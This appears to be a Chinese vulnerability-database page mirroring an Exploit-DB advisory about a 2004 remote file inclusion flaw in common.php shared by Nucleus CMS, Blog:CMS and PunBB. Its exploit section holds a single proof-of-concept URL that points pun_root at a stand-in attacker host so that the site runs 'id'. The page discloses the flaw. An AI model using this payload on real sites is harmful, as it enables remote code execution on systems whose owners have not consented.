Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x – ‘Common.php’ Remote File Inclusion-安全小百科

Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x – ‘Common.php’ Remote File Inclusion

漏洞ID	1054532	漏洞类型
发布时间	2004-07-20	更新时间	2004-07-20
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	PHP	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/24296

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

source: http://www.securityfocus.com/bid/10760/info

Nucleus CMS, Blog:CMS, and PunBB are vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer.

Input passed to the 'common.php' script is not sufficiently sanitized.

All three applications are vulnerable because they have a similar or identical code base.

http://www.example.com/forum/include/common.php?pun_root=http://www.host_evil.com/cmd?&=id

相关推荐: phpFriendlyAdmin Unspecified Cross-Site Scripting Vulnerability

phpFriendlyAdmin Unspecified Cross-Site Scripting Vulnerability 漏洞ID 1099289 漏洞类型 Input Validation Error 发布时间 2003-11-20 更新时间 2003…

文章版权归作者所有，未经允许请勿转载。

THE END